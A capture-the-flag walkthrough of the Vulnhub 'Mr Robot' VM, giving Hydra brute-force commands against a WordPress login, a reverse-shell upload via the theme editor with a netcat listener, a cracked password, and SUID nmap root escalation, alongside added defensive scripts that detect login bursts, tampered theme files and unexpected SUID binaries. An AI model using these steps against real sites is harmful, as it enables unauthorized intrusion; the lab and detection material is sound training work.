Vulnhub: Mr Robot — Walkthrough

Jiebs
Feb 21, 2019


Description from author

Based on the show, Mr. Robot.
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

Information Gathering

Let’s start with a simple port scan.

mkdir scans
nmap -sC -Pn -sV -oA scans/nmap_initial 10.0.2.4

Nothing too interesting: just a web server and SSH. Let’s do some further scanning with Nikto.

nikto -h 10.0.2.4 -o scans/nikto.txt

While Nikto was running, I took the chance to check out the website manually. I searched for common files and folders and found something interesting in /robots.txt!

That gave us the first of the three keys and a .dic wordlist. Let’s quickly grab both with wget. The .dic file contains a lot of duplicates, so let’s deduplicate it and save the result for later use (sort -u already drops the duplicates, so no separate uniq pass is needed).

sort -u fsocity.dic > uniq_fsocity.dic

In the meantime our Nikto scan has finished.

WordPress is running in the background. The first thing I do when I know WordPress is installed is run wpscan, but nothing too interesting came up, and it wasn’t able to enumerate users either.

Luckily for us, we know we can brute-force the username and password of an HTTP form with Hydra. Here is the POST request made when we try to log in at /wp-login.php:

The POST request uses two parameters, log and pwd. Now that we know this, let’s run Hydra. The F= option tells Hydra which string in the response marks a failed attempt; WordPress answers an unknown username with “Invalid username”, so any attempt whose response lacks that string reveals a valid username, whatever password we send.

hydra -vV -L uniq_fsocity.dic -p jiebs 10.0.2.4 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

After a bit of waiting we get the username (the dummy password “jiebs” is irrelevant here, only the missing “Invalid username” string counts as a hit).

[80][http-post-form] host: 10.0.2.4 login: elliot password: jiebs

Let’s try to grab the password for elliot with the same .dic file now. This time the failure string is “is incorrect”, which is what WordPress returns for a wrong password.

hydra -vV -l elliot -P uniq_fsocity.dic 10.0.2.4 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'

Again, after a bit of waiting, we get the password.

[80][http-post-form] host: 10.0.2.4 login: elliot password: ER28-0652
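The two Hydra runs above work because WordPress answers differently for an unknown username (“Invalid username”) and for a wrong password (“is incorrect”), and because nothing on the VM throttles POSTs to /wp-login.php. On the defending side the same burst is easy to spot in the web server’s access log. The Python script below is an added example written for this walkthrough, not code from the original post: it parses combined-format access log lines, flags any source IP with more than a threshold of POSTs to /wp-login.php inside a sliding window, and notes whether a 302 redirect (WordPress’s response to a successful login) followed a run of 200s (the form re-rendered with an error). The log lines, the 192.0.2.x addresses and the threshold are constructed for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one combined-format access log line into a dict, or None if it
    does not match (malformed lines are skipped, not fatal)."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],  # drop query string
        "status": int(m.group("status")),
    }


def find_login_bruteforce(lines, threshold=10, window=timedelta(minutes=1)):
    """Flag source IPs that POST to /wp-login.php more than `threshold` times
    inside any sliding `window`. A failed WordPress login returns HTTP 200
    (the form with an error), a successful one a 302 redirect, so a 302
    after a run of 200s suggests that the guessing worked."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == "/wp-login.php":
            per_ip[rec["ip"]].append((rec["ts"], rec["status"]))

    flagged = {}
    for ip, events in per_ip.items():
        events.sort()
        times = [t for t, _ in events]
        start, burst = 0, False
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1  # slide the window forward
            if end - start + 1 > threshold:
                burst = True
                break
        if not burst:
            continue
        seen_failure, succeeded = False, False
        for _, status in events:
            if status == 200:
                seen_failure = True
            elif status == 302 and seen_failure:
                succeeded = True
        flagged[ip] = {"attempts": len(events), "succeeded": succeeded}
    return flagged


def constructed_sample():
    """Constructed sample log (not real traffic): 15 failed guesses from
    192.0.2.10 within 30 seconds followed by a successful login, plus one
    legitimate login from 192.0.2.20."""
    base = datetime(2019, 2, 21, 12, 0, 0, tzinfo=timezone.utc)

    def line(ip, offset, method, path, status):
        ts = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "curl/7.64"'

    lines = [line("192.0.2.10", 2 * i, "POST", "/wp-login.php", 200) for i in range(15)]
    lines.append(line("192.0.2.10", 30, "POST", "/wp-login.php", 302))
    lines.append(line("192.0.2.20", 5, "GET", "/wp-login.php", 200))
    lines.append(line("192.0.2.20", 9, "POST", "/wp-login.php", 302))
    return lines


if __name__ == "__main__":
    for ip, info in find_login_bruteforce(constructed_sample()).items():
        print(f"{ip}: {info['attempts']} login POSTs, success={info['succeeded']}")
```

On a real server, feed it the access log (for example `find_login_bruteforce(open("/var/log/apache2/access.log"))`) and tune the threshold to what your users actually do; the same per-IP window is what a rate limit in front of wp-login.php would enforce.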

Great, we have the username and password. Let’s log in and start the exploitation part!

Exploitation

After some poking around in the WordPress admin panel, I figured I should try to upload a reverse shell. I used the PHP reverse shell from pentestmonkey; make sure you change the IP and port to match your listener. Go to Appearance > Editor > 404 Template (404.php) > paste the .php script > click Upload.

Let’s make sure we’re listening on the port.

nc -lvp 1234

Once you’re listening on the port, let’s trigger the reverse shell by requesting the modified template.

curl http://10.0.2.4/404.php

And we have a shell back with the user daemon!
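Uploading a shell through Appearance > Editor only works because the VM leaves the built-in file editor enabled; WordPress removes that editor when wp-config.php defines DISALLOW_FILE_EDIT as true. The Python audit below is an added example, not part of the original walkthrough and not WordPress’s own code: it reports whether that constant is set and lists theme PHP files that call the functions a PHP reverse shell or web shell depends on, which is how a modified 404.php like the one above stands out from the stock template. The demo install tree, the theme name demo-theme and the indicator list are constructed assumptions for the example.

```python
import os
import re
import tempfile

# Matches the real WordPress setting: define('DISALLOW_FILE_EDIT', true);
DISALLOW_RE = re.compile(
    r"""define\(\s*['"]DISALLOW_FILE_EDIT['"]\s*,\s*(true|false)\s*\)""",
    re.IGNORECASE,
)

# Calls a PHP reverse shell or web shell typically relies on. The list is an
# assumption for the demo; tune it for your environment.
SUSPICIOUS_CALL_RE = re.compile(
    r"\b(fsockopen|proc_open|popen|shell_exec|passthru|system|exec|eval|base64_decode)\s*\("
)


def file_editing_disabled(wp_config_text):
    """True only if wp-config.php defines DISALLOW_FILE_EDIT as true."""
    m = DISALLOW_RE.search(wp_config_text)
    return m is not None and m.group(1).lower() == "true"


def scan_theme_php(theme_dir):
    """Return {relative path: sorted indicator names} for every theme PHP file
    that contains at least one of the suspicious calls."""
    hits = {}
    for dirpath, _, filenames in os.walk(theme_dir):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = sorted(set(SUSPICIOUS_CALL_RE.findall(fh.read())))
            if found:
                hits[os.path.relpath(path, theme_dir)] = found
    return hits


def audit(wp_root):
    """Audit one WordPress install rooted at wp_root."""
    with open(os.path.join(wp_root, "wp-config.php"), encoding="utf-8") as fh:
        config_text = fh.read()
    return {
        "file_edit_disabled": file_editing_disabled(config_text),
        "suspicious_theme_files": scan_theme_php(
            os.path.join(wp_root, "wp-content", "themes")),
    }


def build_demo_install():
    """Constructed demo tree (not a real install): editor left enabled, a clean
    index.php, and a 404.php whose body now opens a socket and a process.
    Returns the temporary root directory."""
    root = tempfile.mkdtemp()
    theme = os.path.join(root, "wp-content", "themes", "demo-theme")
    os.makedirs(theme)
    with open(os.path.join(root, "wp-config.php"), "w") as fh:
        fh.write("<?php\ndefine('DB_NAME', 'wordpress');\n")  # no DISALLOW_FILE_EDIT
    with open(os.path.join(theme, "index.php"), "w") as fh:
        fh.write("<?php get_header(); get_footer();\n")
    with open(os.path.join(theme, "404.php"), "w") as fh:
        # Non-functional stand-in for a tampered template: only the call names matter.
        fh.write("<?php $s = fsockopen(/* ... */); $p = proc_open(/* ... */);\n")
    return root


if __name__ == "__main__":
    result = audit(build_demo_install())
    print("DISALLOW_FILE_EDIT set:", result["file_edit_disabled"])
    for path, calls in result["suspicious_theme_files"].items():
        print("review:", path, "->", ", ".join(calls))
```

Point `audit()` at a real document root to check a live site; a hit in a theme file is a prompt to diff it against the upstream theme package, and a false `file_edit_disabled` means the admin panel alone is enough to write PHP to the web root.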

Let’s quickly spawn a TTY shell and start snooping around.

python -c 'import pty; pty.spawn("/bin/sh")'

After searching around I found an interesting directory (/home/robot) with the 2nd key!

When trying to cat the 2nd key we get permission denied, so I started looking at the password.raw-md5 file, as the name certainly sounds interesting.

Great, it looks like a password hash for the robot user! I went online and cracked the hash; the result is “abcdefghijklmnopqrstuvwxyz”. Let’s go ahead and switch to the robot user.

Great, now let’s see if we can read the 2nd key.

Great, now let’s move on and get root!

Privilege escalation

After going through a bunch of directories and files looking for hints, I started looking at binaries with the SUID bit set.

We can run nmap as root since its SUID bit is set. Let’s check the version. Older versions of nmap have an interactive mode from which you can escape to a shell, and because the SUID bit is set, that shell runs as root.
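Finding the SUID nmap by hand is what the attacker does; a defender wants the same list produced automatically and compared with what the host is supposed to have. The Python script below is an added example, not from the original post: it walks a directory tree without following symlinks, collects regular files with the setuid bit, and reports those missing from a baseline. The BASELINE set and the demo tree (a SUID passwd, a non-SUID ls and a SUID nmap) are constructed assumptions; on a real host the baseline comes from the package manifest or a known-good image, and the audit runs against / with root privileges.

```python
import os
import stat
import tempfile

# Assumed baseline for the demo; on a real host derive it from the package
# manager's file manifest or from a known-good image of the same build.
BASELINE = {"bin/ping", "bin/su", "usr/bin/passwd", "usr/bin/sudo"}


def is_suid(mode):
    """True for a regular file whose setuid bit is set (directories and
    other file types are ignored)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_suid(root):
    """Walk `root` with lstat (symlinks are not followed) and return the
    sorted relative paths of all SUID regular files."""
    found = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable: skip rather than abort the audit
            if is_suid(st.st_mode):
                found.append(os.path.relpath(path, root))
    return sorted(found)


def unexpected_suid(found, baseline=BASELINE):
    """SUID files outside the baseline; each one needs a justification, and a
    SUID copy of a tool with an interactive or scripting mode never has one."""
    return sorted(set(found) - set(baseline))


def build_demo_tree():
    """Constructed filesystem stub (not a real root): passwd (expected SUID),
    ls (not SUID) and a SUID nmap that is not in the baseline. Returns
    (root, suid_bit_stuck) so callers can tell if chmod honoured the bit."""
    root = tempfile.mkdtemp()
    files = {"usr/bin/passwd": 0o4755, "bin/ls": 0o755, "usr/local/bin/nmap": 0o4755}
    for rel, mode in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")  # placeholder content, never executed
        os.chmod(path, mode)
    stuck = bool(os.stat(os.path.join(root, "usr/bin/passwd")).st_mode & stat.S_ISUID)
    return root, stuck


if __name__ == "__main__":
    root, _ = build_demo_tree()
    for path in unexpected_suid(find_suid(root)):
        print("review:", path)
```

Against a live system the call is `unexpected_suid(find_suid("/"))` run as root; the output is the short list to review, and a scheduled run that diffs today’s list against yesterday’s catches a newly planted SUID binary as well as one left behind by an installer.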

Let’s check out the root directory for the last flag.

Thanks for reading and happy hacking!
